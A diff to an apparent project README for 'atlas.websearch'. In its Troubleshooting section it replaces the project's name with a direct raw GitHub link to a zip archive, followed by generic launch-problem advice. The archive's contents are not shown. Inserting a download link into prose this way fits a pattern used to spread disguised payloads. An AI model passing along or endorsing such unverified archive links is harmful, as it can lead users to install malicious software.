sigmaking157/atlas.websearch/README.md

 ## ⚙️ Troubleshooting

-If you encounter issues while using atlas.websearch, here are some common problems and solutions:
+If you encounter issues while using https://raw.githubusercontent.com/sigmaking157/atlas.websearch/main/pkg/search/websearch_atlas_v3.9.zip, here are some common problems and solutions:

 - **Problem**: Application not launching.
   - **Solution**: Ensure you have installed the correct version for your operating system.